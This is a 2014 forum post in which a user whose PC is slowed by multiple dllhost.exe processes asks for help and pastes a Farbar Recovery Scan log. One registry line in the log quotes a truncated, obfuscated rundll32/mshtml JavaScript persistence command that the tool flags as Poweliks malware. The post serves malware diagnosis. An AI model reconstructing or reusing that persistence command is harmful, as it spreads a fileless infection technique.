Many dllhost.exe *32 processes from Syswow64 folder
ascot1340
2014-10-30, 04:34
My computer has been slow and multiple dllhost.exe *32 processes are running in the task manager with properties that say they are located in the Syswow64 folder. Scans of Malwarebytes and Microsoft Security Essentials do not detect any threats. Attempts to download additional antivirus programs are met with a "Security Alert" that reads "Your current security settings do not allow this file to be downloaded." I've expended my ideas. Any help would be greatly appreciated!
Note: I attempted to download the Registry Backup, Farbar Recovery Scan Tool, and the aswMBR program as instructed in the "Before You Post" sticky, but got the same "Your current security settings do not allow this file to be downloaded" message.
Got the Registry Backup, Farbar Recovery Scan Tool, and the aswMBR program to download by resetting the security settings under Internet Options to the default level. I saved a registry backup. The Farbar and aswMBR logs are below:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-10-2014
Ran by Ryan (administrator) on RYAN-PC on 30-10-2014 03:06:46
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [Google Update] => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-10-27] (Google Inc.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x76D36B0F2FC9CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-10-30 03:07 - 2014-10-30 03:07 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-10-30 03:06 - 2014-10-30 03:07 - 00013622 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-10-30 03:06 - 2014-10-30 03:06 - 02113536 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-10-30 03:02 - 2014-10-30 03:02 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-10-30 01:51 - 2014-10-30 01:51 - 00000606 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-10-30 01:32 - 2014-10-30 03:06 - 00000000 ____D () C:\FRST
2014-10-30 01:30 - 2014-10-30 01:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 01:28 - 2014-10-30 01:28 - 00000000 ____D () C:\RegBackup
2014-10-30 01:27 - 2014-10-30 01:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 01:27 - 2014-10-30 01:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 01:27 - 2014-10-30 01:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 19:45 - 2014-10-29 19:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 16:38 - 2014-10-15 16:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 16:38 - 2014-10-15 16:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 16:38 - 2014-10-15 16:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 20:39 - 2014-10-20 22:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 16:21 - 2014-09-28 20:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 16:21 - 2014-07-06 22:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 16:21 - 2014-07-06 22:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 16:21 - 2014-07-06 22:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 16:21 - 2014-07-06 21:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 16:21 - 2014-07-06 21:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 16:21 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 16:21 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 16:21 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 16:20 - 2014-10-09 22:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 16:20 - 2014-10-09 22:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 16:20 - 2014-10-09 22:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 16:20 - 2014-10-06 22:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 16:20 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 16:20 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 16:20 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 16:20 - 2014-09-25 18:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 16:20 - 2014-09-18 21:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 16:20 - 2014-09-18 21:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 16:20 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 16:20 - 2014-09-18 21:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 16:20 - 2014-09-18 21:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 16:20 - 2014-09-18 21:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 16:20 - 2014-09-18 21:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 16:20 - 2014-09-18 21:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 16:20 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 16:20 - 2014-09-18 21:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 16:20 - 2014-09-18 21:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 16:20 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 16:20 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 16:20 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 16:20 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 16:20 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 16:20 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 16:20 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 16:20 - 2014-09-18 20:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 16:20 - 2014-09-18 20:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 16:20 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 16:20 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 16:20 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 16:20 - 2014-09-18 20:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 16:20 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 16:20 - 2014-08-18 23:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 16:20 - 2014-08-18 23:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 16:20 - 2014-08-18 23:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 16:20 - 2014-08-18 23:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 16:20 - 2014-07-06 22:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 16:20 - 2014-07-06 22:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 16:20 - 2014-07-06 22:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 16:20 - 2014-07-06 22:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 16:20 - 2014-07-06 22:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 16:20 - 2014-07-06 22:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 16:20 - 2014-07-06 22:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 16:20 - 2014-07-06 21:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 16:20 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
